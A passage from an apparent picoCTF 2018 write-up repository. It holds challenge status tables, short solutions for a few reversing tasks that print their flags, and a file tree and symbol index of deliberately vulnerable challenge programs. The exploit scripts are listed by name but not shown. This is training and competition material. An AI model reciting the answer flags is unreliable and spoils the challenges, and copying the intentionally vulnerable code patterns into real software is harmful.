<td markdown="span"><a href="Cryptography/hertz%202">hertz 2</a></td>
<td markdown="span">200</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Cryptography/Safe%20RSA">Safe RSA</a></td>
<td markdown="span">250</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Cryptography/caesar%20cipher%202">caesar cipher 2</a></td>
<td markdown="span">250</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Cryptography/rsa-madlibs">rsa-madlibs</a></td>
<td markdown="span">250</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Cryptography/SpyFi">SpyFi</a></td>
<td markdown="span">300</td>
<td markdown="span">Unsolved</td>
</tr>
<tr>
<td markdown="span"><a href="Cryptography/Super%20Safe%20RSA">Super Safe RSA</a></td>
<td markdown="span">350</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Cryptography/Super%20Safe%20RSA%202">Super Safe RSA 2</a></td>
<td markdown="span">425</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Cryptography/Magic%20Padding%20Oracle">Magic Padding Oracle</a></td>
<td markdown="span">450</td>
<td markdown="span">Unsolved</td>
</tr>
<tr>
<td markdown="span"><a href="Cryptography/Super%20Safe%20RSA%203">Super Safe RSA 3</a></td>
<td markdown="span">600</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Cryptography/James%20Brahm%20Returns">James Brahm Returns</a></td>
<td markdown="span">700</td>
<td markdown="span">Unsolved</td>
</tr>
</tbody>
</table>
## Forensics
<table>
<thead>
<tr class="header">
<th>Challenges</th>
<th>Points</th>
<th>Status</th>
</tr>
</thead>
<tbody>
<tr>
<td markdown="span"><a href="Forensics/Forensics%20Warmup%201">Forensics Warmup 1</a></td>
<td markdown="span">50</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Forensics/Forensics%20Warmup%202">Forensics Warmup 2</a></td>
<td markdown="span">50</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Forensics/Desrouleaux">Desrouleaux</a></td>
<td markdown="span">150</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Forensics/Reading%20Between%20the%20Eyes">Reading Between the Eyes</a></td>
<td markdown="span">150</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Forensics/Recovering%20From%20the%20Snap">Recovering From the Snap</a></td>
<td markdown="span">150</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Forensics/admin%20panel">admin panel</a></td>
<td markdown="span">150</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Forensics/hex%20editor">hex editor</a></td>
<td markdown="span">150</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Forensics/Truly%20an%20Artist">Truly an Artist</a></td>
<td markdown="span">200</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Forensics/now%20you%20don%27t">now you don't</a></td>
<td markdown="span">200</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Forensics/Ext%20Super%20Magic">Ext Super Magic</a></td>
<td markdown="span">250</td>
<td markdown="span">Unsolved</td>
</tr>
<tr>
<td markdown="span"><a href="Forensics/Lying%20Out">Lying Out</a></td>
<td markdown="span">250</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Forensics/What%27s%20My%20Name%3F">What's My Name?</a></td>
<td markdown="span">250</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Forensics/core">core</a></td>
<td markdown="span">350</td>
<td markdown="span">Unsolved</td>
</tr>
<tr>
<td markdown="span"><a href="Forensics/Malware%20Shops">Malware Shops</a></td>
<td markdown="span">400</td>
<td markdown="span">Unsolved</td>
</tr>
<tr>
<td markdown="span"><a href="Forensics/LoadSomeBits">LoadSomeBits</a></td>
<td markdown="span">550</td>
<td markdown="span">Solved</td>
</tr>
</tbody>
</table>
## General Skills
<table>
<thead>
<tr class="header">
<th>Challenges</th>
<th>Points</th>
<th>Status</th>
</tr>
</thead>
<tbody>
<tr>
<td markdown="span"><a href="General%20Skills/General%20Warmup%201">General Skills 1</a></td>
<td markdown="span">50</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="General%20Skills/General%20Warmup%202">General Skills 2</a></td>
<td markdown="span">50</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="General%20Skills/General%20Warmup%203">General Skills 3</a></td>
<td markdown="span">50</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="General%20Skills/Resources">Resources</a></td>
<td markdown="span">50</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="General%20Skills/grep%201">grep 1</a></td>
<td markdown="span">75</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="General%20Skills/net%20cat">net cat</a></td>
<td markdown="span">75</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="General%20Skills/strings">strings</a></td>
<td markdown="span">100</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="General%20Skills/pipe">pipe</a></td>
<td markdown="span">110</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="General%20Skills/grep%202">grep 2</a></td>
<td markdown="span">125</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="General%20Skills/Aca-Shell-A">Aca-Shell-A</a></td>
<td markdown="span">150</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="General%20Skills/environ">environ</a></td>
<td markdown="span">150</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="General%20Skills/ssh-keyz">ssh-keyz</a></td>
<td markdown="span">150</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="General%20Skills/what%20base%20is%20this%3F">what base is this?</a></td>
<td markdown="span">200</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="General%20Skills/you%20can%27t%20see%20me">you can't see me</a></td>
<td markdown="span">200</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="General%20Skills/absolutely%20relative">absolutely relative</a></td>
<td markdown="span">200</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="General%20Skills/in%20out%20error">in out error</a></td>
<td markdown="span">275</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="General%20Skills/learn%20gdb">learn gdb</a></td>
<td markdown="span">300</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="General%20Skills/roulette">roulette</a></td>
<td markdown="span">350</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="General%20Skills/store">store</a></td>
<td markdown="span">400</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="General%20Skills/script%20me">script me</a></td>
<td markdown="span">500</td>
<td markdown="span">Solved (<a href="https://github.com/plusline">@plusline</a>)</td>
</tr>
<tr>
<td markdown="span"><a href="General%20Skills/Dog%20or%20Frog">Dog or Frog</a></td>
<td markdown="span">900</td>
<td markdown="span">Unsolved</td>
</tr>
</tbody>
</table>
## Reversing
<table>
<thead>
<tr class="header">
<th>Challenges</th>
<th>Points</th>
<th>Status</th>
</tr>
</thead>
<tbody>
<tr>
<td markdown="span"><a href="Reversing/Reversing%20Warmup%201">Reversing Warmup 1</a></td>
<td markdown="span">50</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Reversing/Reversing%20Warmup%202">Reversing Warmup 2</a></td>
<td markdown="span">50</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Reversing/assembly-0">assembly-0</a></td>
<td markdown="span">150</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Reversing/assembly-1">assembly-1</a></td>
<td markdown="span">200</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Reversing/be-quick-or-be-dead-1">be-quick-or-be-dead-1</a></td>
<td markdown="span">200</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Reversing/quackme">quackme</a></td>
<td markdown="span">200</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Reversing/assembly-2">assembly-2</a></td>
<td markdown="span">250</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Reversing/be-quick-or-be-dead-2">be-quick-or-be-dead-2</a></td>
<td markdown="span">275</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Reversing/be-quick-or-be-dead-3">be-quick-or-be-dead-3</a></td>
<td markdown="span">350</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Reversing/quackme%20up">quackme up</a></td>
<td markdown="span">350</td>
<td markdown="span">Unsolved</td>
</tr>
<tr>
<td markdown="span"><a href="Reversing/Radix%27s%20Terminal">Radix's Terminal</a></td>
<td markdown="span">400</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Reversing/assembly-3">assembly-3</a></td>
<td markdown="span">400</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Reversing/keygen-me-1">keygen-me-1</a></td>
<td markdown="span">400</td>
<td markdown="span">Unsolved</td>
</tr>
<tr>
<td markdown="span"><a href="Reversing/assembly-4">assembly-4</a></td>
<td markdown="span">550</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Reversing/special-pw">special-pw</a></td>
<td markdown="span">600</td>
<td markdown="span">Unsolved</td>
</tr>
</tbody>
</table>
## Web Exploitation
<table>
<thead>
<tr class="header">
<th>Challenges</th>
<th>Points</th>
<th>Status</th>
</tr>
</thead>
<tbody>
<tr>
<td markdown="span"><a href="Web%20Exploitation%2FInspect%20Me">Inspect Me</a></td>
<td markdown="span">125</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Web%20Exploitation/Client%20Side%20is%20Still%20Bad">Client Side is Still Bad</a></td>
<td markdown="span">150</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Web%20Exploitation/Logon">Logon</a></td>
<td markdown="span">150</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Web%20Exploitation/Irish%20Name%20Repo">Irish Name Repo</a></td>
<td markdown="span">200</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Web%20Exploitation/Mr.%20Robots">Mr. Robots</a></td>
<td markdown="span">200</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Web%20Exploitation/No%20Login">No Login</a></td>
<td markdown="span">200</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Web%20Exploitation/Secret%20Agent">Secret Agent</a></td>
<td markdown="span">200</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Web%20Exploitation/Buttons">Buttons</a></td>
<td markdown="span">250</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Web%20Exploitation/The%20Vault">The Vault</a></td>
<td markdown="span">250</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Web%20Exploitation/Artisinal%20Handcrafted%20HTTP%203">Artisinal Handcrafted HTTP 3</a></td>
<td markdown="span">300</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Web%20Exploitation/Flaskcards">Flaskcards</a></td>
<td markdown="span">350</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Web%20Exploitation/fancy-alive-monitoring">fancy-alive-monitoring</a></td>
<td markdown="span">400</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Web%20Exploitation/Secure%20Logon">Secure Logon</a></td>
<td markdown="span">500</td>
<td markdown="span">Unsolved</td>
</tr>
<tr>
<td markdown="span"><a href="Web%20Exploitation/Flaskcards%20Skeleton%20Key">Flaskcards Skeleton Key</a></td>
<td markdown="span">600</td>
<td markdown="span">Unsolved</td>
</tr>
<tr>
<td markdown="span"><a href="Web%20Exploitation/Help%20Me%20Reset%202">Help Me Reset 2</a></td>
<td markdown="span">600</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="Web%20Exploitation/A%20Simple%20Question">A Simple Question</a></td>
<td markdown="span">650</td>
<td markdown="span">Solved</td>
</tr>
<tr>
<td markdown="span"><a href="LambDash%203">LambDash 3</a></td>
<td markdown="span">800</td>
<td markdown="span">Unsolved</td>
</tr>
</tbody>
</table>
================================================
FILE: Reversing/Radix's Terminal/README.md
================================================
# Radix's Terminal
Points: 400
## Category
Reversing
## Question
>Can you find the password to Radix's login? You can also find the executable in /problems/radix-s-terminal_0_b6b476e9952f39511155a2e64fb75248?
### Hint
>https://en.wikipedia.org/wiki/Base64
## Solution
Based off the hint, we can assume the flag is being encoded in base64 just by doing _strings_
```
cGljb0NURntiQXNFXzY0X2VOQ29EaU5nX2lTX0VBc1lfNDE3OTk0NTF9
Please provide a password!
Congrats, now where's my flag?
Incorrect Password!
;*2$"
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.10) 5.4.0 20160609
```
putting the string cGljb0NURntiQXNFXzY0X2VOQ29EaU5nX2lTX0VBc1lfNDE3OTk0NTF9 in a base 64 decode will return us the flag
### Flag
`picoCTF{bAsE_64_eNCoDiNg_iS_EAsY_41799451}`
================================================
FILE: Reversing/Reversing Warmup 1/README.md
================================================
# Reversing Warmup 1
Points: 50
## Category
Reversing
## Question
>Throughout your journey you will have to run many programs. Can you navigate to /problems/reversing-warmup-1_1_b416a2d0694c871d8728d8268d84ac5c on the shell server and run this [program](files/run) to retreive the flag?
### Hint
>If you are searching online, it might be worth finding how to exeucte a program in command line.
## Solution
Download the file and make it executable if needed to `chmod +x run`
Run the file by doing `./run`
### Flag
`picoCTF{welc0m3_t0_r3VeRs1nG}`
================================================
FILE: Reversing/Reversing Warmup 2/README.md
================================================
# Reversing Warmup 2
Points: 50
## Category
Reversing
## Question
>Can you decode the following string `dGg0dF93NHNfczFtcEwz` from base64 format to ASCII?
### Hint
>Submit your answer in our competition's flag format. For example, if you answer was 'hello', you would submit 'picoCTF{hello}' as the flag.
## Solution
```python
>>> print 'dGg0dF93NHNfczFtcEwz'.decode('base64')
th4t_w4s_s1mpL3
```
### Flag
`picoCTF{th4t_w4s_s1mpL3}`
================================================
FILE: Reversing/assembly-0/README.md
================================================
# assembly-0
Points: 150
## Category
Reversing
## Question
>What does asm0(0xc9,0xb0) return? Submit the flag as a hexadecimal value (starting with '0x'). NOTE: Your submission for this question will NOT be in the normal flag format. [Source](files/intro_asm_rev.S) located in the directory at /problems/assembly-0_4_0f197369bfc00a9211504cf65ac31994.
### Hint
>basical assembly [tutorial](https://www.tutorialspoint.com/assembly_programming/assembly_basic_syntax.htm)
>
>assembly [registers](https://www.tutorialspoint.com/assembly_programming/assembly_registers.htm)
## Solution
In assembly, the return value is always _eax_
```asm
asm0:
push ebp
mov ebp,esp
mov eax,DWORD PTR [ebp+0x8]
m
gitextract_onc07rvn/
├── .gitmodules
├── Binary Exploitation/
│ ├── are you root?/
│ │ ├── README.md
│ │ └── files/
│ │ ├── auth
│ │ └── auth.c
│ ├── authenticate/
│ │ ├── README.md
│ │ ├── files/
│ │ │ ├── auth
│ │ │ └── auth.c
│ │ └── solution/
│ │ └── solve.py
│ ├── buffer overflow 0/
│ │ ├── README.md
│ │ ├── files/
│ │ │ ├── vuln
│ │ │ └── vuln.c
│ │ └── solution/
│ │ ├── flag.txt
│ │ ├── solve.py
│ │ └── vuln
│ ├── buffer overflow 1/
│ │ ├── README.md
│ │ ├── files/
│ │ │ ├── flag.txt
│ │ │ ├── vuln
│ │ │ └── vuln.c
│ │ └── solution/
│ │ ├── flag.txt
│ │ ├── solve.py
│ │ └── vuln
│ ├── buffer overflow 2/
│ │ ├── README.md
│ │ ├── files/
│ │ │ ├── flag.txt
│ │ │ ├── vuln
│ │ │ └── vuln.c
│ │ └── solution/
│ │ ├── solve.py
│ │ └── vuln
│ ├── buffer overflow 3/
│ │ ├── README.md
│ │ └── files/
│ │ ├── vuln
│ │ └── vuln.c
│ ├── can-you-gets-me/
│ │ ├── README.md
│ │ ├── files/
│ │ │ ├── gets
│ │ │ └── gets.c
│ │ └── solution/
│ │ └── solve.py
│ ├── echo back/
│ │ ├── README.md
│ │ ├── files/
│ │ │ └── echoback
│ │ └── solution/
│ │ └── solve.py
│ ├── echooo/
│ │ ├── README.md
│ │ ├── files/
│ │ │ ├── echo
│ │ │ └── echo.c
│ │ └── solution/
│ │ └── solve.py
│ ├── got-2-learn-libc/
│ │ ├── README.md
│ │ ├── files/
│ │ │ ├── vuln
│ │ │ └── vuln.c
│ │ └── solution/
│ │ └── solve.py
│ ├── got-shell?/
│ │ ├── README.md
│ │ ├── files/
│ │ │ ├── auth
│ │ │ └── auth.c
│ │ └── solution/
│ │ ├── auth
│ │ └── solve.py
│ ├── gps/
│ │ ├── README.md
│ │ └── files/
│ │ ├── gps
│ │ └── gps.c
│ ├── leak-me/
│ │ ├── README.md
│ │ ├── files/
│ │ │ ├── auth
│ │ │ └── auth.c
│ │ └── solution/
│ │ └── solve.py
│ ├── rop chain/
│ │ ├── README.md
│ │ ├── files/
│ │ │ ├── exp
│ │ │ ├── flag.txt
│ │ │ ├── rop
│ │ │ └── rop.c
│ │ └── solution/
│ │ └── solve.py
│ └── shellcode/
│ ├── README.md
│ ├── files/
│ │ ├── exploit
│ │ ├── vuln
│ │ └── vuln.c
│ └── solution/
│ └── solve.py
├── Cryptography/
│ ├── Crypto Warmup 1/
│ │ ├── README.md
│ │ └── files/
│ │ └── table.txt
│ ├── Crypto Warmup 2/
│ │ └── README.md
│ ├── HEEEEEEERE'S Johnny!/
│ │ ├── README.md
│ │ └── files/
│ │ ├── passwd
│ │ └── shadow
│ ├── James Brahm Returns/
│ │ ├── README.md
│ │ └── files/
│ │ └── source.py
│ ├── Magic Padding Oracle/
│ │ ├── README.md
│ │ ├── files/
│ │ │ └── pkcs7.py
│ │ └── solution/
│ │ ├── requirements.txt
│ │ └── solution.py
│ ├── Safe RSA/
│ │ ├── README.md
│ │ ├── files/
│ │ │ └── ciphertext
│ │ └── solution/
│ │ └── solve.py
│ ├── SpyFi/
│ │ ├── README.md
│ │ └── files/
│ │ └── spy_terminal_no_flag.py
│ ├── Super Safe RSA/
│ │ ├── README.md
│ │ └── solution/
│ │ ├── ciphertext
│ │ └── solve.py
│ ├── Super Safe RSA 2/
│ │ ├── README.md
│ │ └── solution/
│ │ ├── ciphertext
│ │ ├── solve.py
│ │ └── wienerAttack/
│ │ ├── Arithmetic.py
│ │ ├── ContinuedFractions.py
│ │ ├── RSAwienerHacker.py
│ │ └── __init__.py
│ ├── Super Safe RSA 3/
│ │ ├── README.md
│ │ └── solution/
│ │ ├── ciphertext
│ │ └── solve.py
│ ├── blaise's cipher/
│ │ ├── README.md
│ │ └── solution/
│ │ └── ciphertext
│ ├── caesar cipher 1/
│ │ ├── README.md
│ │ └── files/
│ │ └── ciphertext
│ ├── caesar cipher 2/
│ │ ├── README.md
│ │ └── files/
│ │ └── ciphertext
│ ├── hertz/
│ │ ├── README.md
│ │ └── solution/
│ │ └── ciphertext
│ ├── hertz 2/
│ │ ├── README.md
│ │ └── solution/
│ │ └── ciphertext
│ └── rsa-madlibs/
│ ├── README.md
│ └── solution/
│ └── solve.py
├── Forensics/
│ ├── Desrouleaux/
│ │ ├── README.md
│ │ └── files/
│ │ └── incidents.json
│ ├── Ext Super Magic/
│ │ ├── README.md
│ │ └── files/
│ │ └── ext-super-magic.img
│ ├── Forensics Warmup 1/
│ │ └── README.md
│ ├── Forensics Warmup 2/
│ │ └── README.md
│ ├── LoadSomeBits/
│ │ └── README.md
│ ├── Lying Out/
│ │ └── README.md
│ ├── Malware Shops/
│ │ ├── README.md
│ │ └── files/
│ │ └── info.txt
│ ├── Reading Between the Eyes/
│ │ └── README.md
│ ├── Recovering From the Snap/
│ │ ├── README.md
│ │ └── files/
│ │ └── animals.dd
│ ├── Truly an Artist/
│ │ └── README.md
│ ├── What's My Name?/
│ │ ├── README.md
│ │ └── files/
│ │ └── myname.pcap
│ ├── admin panel/
│ │ ├── README.md
│ │ └── files/
│ │ └── admin_panel.pcap
│ ├── core/
│ │ ├── README.md
│ │ └── files/
│ │ ├── core
│ │ └── print_flag
│ ├── hex editor/
│ │ └── README.md
│ └── now you don't/
│ └── README.md
├── General Skills/
│ ├── Aca-Shell-A/
│ │ └── README.md
│ ├── Dog or Frog/
│ │ └── README.md
│ ├── General Warmup 1/
│ │ └── README.md
│ ├── General Warmup 2/
│ │ └── README.md
│ ├── General Warmup 3/
│ │ └── README.md
│ ├── Resources/
│ │ ├── README.md
│ │ └── solution/
│ │ └── source/
│ │ └── resources
│ ├── absolutely relative/
│ │ ├── README.md
│ │ └── files/
│ │ ├── absolutely-relative
│ │ ├── absolutely-relative.c
│ │ └── permission.txt
│ ├── environ/
│ │ └── README.md
│ ├── grep 1/
│ │ ├── README.md
│ │ └── files/
│ │ └── file
│ ├── grep 2/
│ │ └── README.md
│ ├── in out error/
│ │ ├── README.md
│ │ └── files/
│ │ └── in-out-error
│ ├── learn gdb/
│ │ ├── README.md
│ │ └── files/
│ │ └── run
│ ├── net cat/
│ │ └── README.md
│ ├── pipe/
│ │ └── README.md
│ ├── roulette/
│ │ ├── README.md
│ │ ├── files/
│ │ │ ├── roulette
│ │ │ └── roulette.c
│ │ └── solution/
│ │ ├── Makefile
│ │ ├── generate.c
│ │ └── solve.py
│ ├── script me/
│ │ ├── README.md
│ │ └── solution/
│ │ └── solve.py
│ ├── ssh-keyz/
│ │ └── README.md
│ ├── store/
│ │ ├── README.md
│ │ └── files/
│ │ ├── source.c
│ │ └── store
│ ├── strings/
│ │ ├── README.md
│ │ └── files/
│ │ └── strings
│ ├── what base is this?/
│ │ ├── README.md
│ │ └── solution/
│ │ └── solve.py
│ └── you can't see me/
│ └── README.md
├── README.md
├── Reversing/
│ ├── Radix's Terminal/
│ │ └── README.md
│ ├── Reversing Warmup 1/
│ │ ├── README.md
│ │ └── files/
│ │ └── run
│ ├── Reversing Warmup 2/
│ │ └── README.md
│ ├── assembly-0/
│ │ ├── README.md
│ │ └── files/
│ │ └── intro_asm_rev.S
│ ├── assembly-1/
│ │ ├── README.md
│ │ └── files/
│ │ └── eq_asm_rev.S
│ ├── assembly-2/
│ │ ├── README.md
│ │ ├── files/
│ │ │ └── loop_asm_rev.S
│ │ └── solution/
│ │ ├── Makefile
│ │ ├── loop.s
│ │ ├── solve.c
│ │ └── solve.sh
│ ├── assembly-3/
│ │ ├── README.md
│ │ ├── files/
│ │ │ └── end_asm_rev.S
│ │ └── solution/
│ │ ├── Makefile
│ │ ├── end.s
│ │ ├── solve.c
│ │ └── solve.sh
│ ├── assembly-4/
│ │ ├── README.md
│ │ ├── files/
│ │ │ ├── Makefile
│ │ │ └── comp.nasm
│ │ └── solution/
│ │ ├── Makefile
│ │ ├── comp.nasm
│ │ └── solve.sh
│ ├── be-quick-or-be-dead-1/
│ │ ├── README.md
│ │ ├── files/
│ │ │ └── be-quick-or-be-dead-1
│ │ └── solution/
│ │ └── be-quick-or-be-dead-1_patched
│ ├── be-quick-or-be-dead-2/
│ │ ├── README.md
│ │ ├── files/
│ │ │ └── be-quick-or-be-dead-2
│ │ └── solution/
│ │ ├── be-quick-or-be-dead-2_patched
│ │ └── calculate.py
│ ├── be-quick-or-be-dead-3/
│ │ ├── README.md
│ │ ├── files/
│ │ │ └── be-quick-or-be-dead-3
│ │ └── solution/
│ │ ├── be-quick-or-be-dead-3
│ │ └── solve.py
│ ├── keygen-me-1/
│ │ ├── README.md
│ │ ├── files/
│ │ │ └── activate
│ │ └── solution/
│ │ └── test.c
│ ├── quackme/
│ │ ├── README.md
│ │ ├── files/
│ │ │ └── main
│ │ └── solution/
│ │ └── solve.py
│ ├── quackme up/
│ │ ├── README.md
│ │ └── files/
│ │ └── main
│ └── special-pw/
│ ├── README.md
│ └── files/
│ └── special_pw.S
├── Web Exploitation/
│ ├── A Simple Question/
│ │ ├── README.md
│ │ └── solution/
│ │ ├── solve.py
│ │ └── source/
│ │ ├── answer2.phps
│ │ └── index.html
│ ├── Artisinal Handcrafted HTTP 3/
│ │ ├── README.md
│ │ └── solution/
│ │ └── solve.py
│ ├── Buttons/
│ │ ├── README.md
│ │ └── solution/
│ │ ├── solve.py
│ │ └── source/
│ │ ├── boo.html
│ │ ├── button1.php
│ │ └── index.html
│ ├── Client Side is Still Bad/
│ │ ├── README.md
│ │ └── solution/
│ │ └── source/
│ │ └── index.html
│ ├── Flaskcards/
│ │ └── README.md
│ ├── Flaskcards Skeleton Key/
│ │ └── README.md
│ ├── Help Me Reset 2/
│ │ └── README.md
│ ├── Inspect Me/
│ │ ├── README.md
│ │ └── solution/
│ │ └── source/
│ │ ├── index.html
│ │ ├── mycss.css
│ │ └── myjs.js
│ ├── Irish Name Repo/
│ │ ├── README.md
│ │ └── solution/
│ │ ├── solve.py
│ │ └── source/
│ │ ├── index.html
│ │ ├── login.html
│ │ └── support.html
│ ├── LambDash 3/
│ │ └── README.md
│ ├── Logon/
│ │ ├── README.md
│ │ └── solution/
│ │ ├── solve.py
│ │ └── source/
│ │ ├── index.html
│ │ └── logout
│ ├── Mr. Robots/
│ │ ├── README.md
│ │ └── solution/
│ │ ├── solve.py
│ │ └── source/
│ │ ├── index.html
│ │ ├── robots.txt
│ │ └── style.css
│ ├── No Login/
│ │ ├── README.md
│ │ └── solution/
│ │ ├── solve.py
│ │ └── source/
│ │ ├── flag
│ │ ├── index.html
│ │ └── unimplemented
│ ├── Secret Agent/
│ │ ├── README.md
│ │ └── solution/
│ │ ├── solve.py
│ │ └── source/
│ │ ├── flag
│ │ ├── index.html
│ │ └── unimplemented
│ ├── Secure Logon/
│ │ ├── README.md
│ │ └── files/
│ │ └── server_noflag.py
│ ├── The Vault/
│ │ ├── README.md
│ │ └── solution/
│ │ ├── solve.py
│ │ └── source/
│ │ ├── index.html
│ │ └── login.txt
│ └── fancy-alive-monitoring/
│ ├── README.md
│ └── solution/
│ ├── solve.py
│ └── source/
│ ├── index.php
│ └── index.txt
├── _config.yml
└── template/
└── README.md
SYMBOL INDEX (101 symbols across 36 files)
FILE: Binary Exploitation/are you root?/files/auth.c
type auth_level_t (line 6) | typedef enum auth_level {
type user (line 14) | struct user {
function give_flag (line 19) | void give_flag(){
function menu (line 36) | void menu(){
function main (line 46) | int main(int argc, char **argv){
FILE: Binary Exploitation/authenticate/files/auth.c
function flag (line 9) | int flag() {
function read_flag (line 23) | void read_flag() {
function main (line 34) | int main(int argc, char **argv) {
FILE: Binary Exploitation/buffer overflow 0/files/vuln.c
function sigsegv_handler (line 10) | void sigsegv_handler(int sig) {
function vuln (line 16) | void vuln(char *input){
function main (line 21) | int main(int argc, char **argv){
FILE: Binary Exploitation/buffer overflow 1/files/vuln.c
function win (line 11) | void win() {
function vuln (line 23) | void vuln(){
function main (line 30) | int main(int argc, char **argv){
FILE: Binary Exploitation/buffer overflow 2/files/vuln.c
function win (line 10) | void win(unsigned int arg1, unsigned int arg2) {
function vuln (line 26) | void vuln(){
function main (line 32) | int main(int argc, char **argv){
FILE: Binary Exploitation/buffer overflow 3/files/vuln.c
function win (line 13) | void win() {
function read_canary (line 27) | void read_canary() {
function vuln (line 38) | void vuln(){
function main (line 64) | int main(int argc, char **argv){
FILE: Binary Exploitation/can-you-gets-me/files/gets.c
function vuln (line 9) | void vuln() {
function main (line 16) | int main(int argc, char **argv){
FILE: Binary Exploitation/echooo/files/echo.c
function main (line 7) | int main(int argc, char **argv){
FILE: Binary Exploitation/got-2-learn-libc/files/vuln.c
function vuln (line 13) | void vuln(){
function main (line 21) | int main(int argc, char **argv){
FILE: Binary Exploitation/got-shell?/files/auth.c
function win (line 7) | void win() {
function main (line 11) | int main(int argc, char **argv) {
FILE: Binary Exploitation/gps/files/gps.c
function initialize (line 10) | void initialize() {
function acquire_satellites (line 19) | void acquire_satellites() {
function main (line 46) | int main() {
FILE: Binary Exploitation/leak-me/files/auth.c
function flag (line 7) | int flag() {
function main (line 22) | int main(int argc, char **argv){
FILE: Binary Exploitation/rop chain/files/rop.c
function win_function1 (line 14) | void win_function1() {
function win_function2 (line 18) | void win_function2(unsigned int arg_check1) {
function flag (line 30) | void flag(unsigned int arg_check2) {
function vuln (line 56) | void vuln() {
function main (line 62) | int main(int argc, char **argv){
FILE: Binary Exploitation/shellcode/files/vuln.c
function vuln (line 10) | void vuln(char *buf){
function main (line 15) | int main(int argc, char **argv){
FILE: Cryptography/James Brahm Returns/files/source.py
function pad (line 12) | def pad(message):
function encrypt (line 19) | def encrypt(key, plain, IV):
function decrypt (line 23) | def decrypt(key, ciphertext, iv):
function verify_mac (line 27) | def verify_mac(message):
function check_padding (line 36) | def check_padding(message):
FILE: Cryptography/Magic Padding Oracle/files/pkcs7.py
function pad (line 16) | def pad(s):
function isvalidpad (line 19) | def isvalidpad(s):
function unpad (line 22) | def unpad(s):
function encrypt (line 25) | def encrypt(m):
function decrypt (line 30) | def decrypt(m):
FILE: Cryptography/Magic Padding Oracle/solution/solution.py
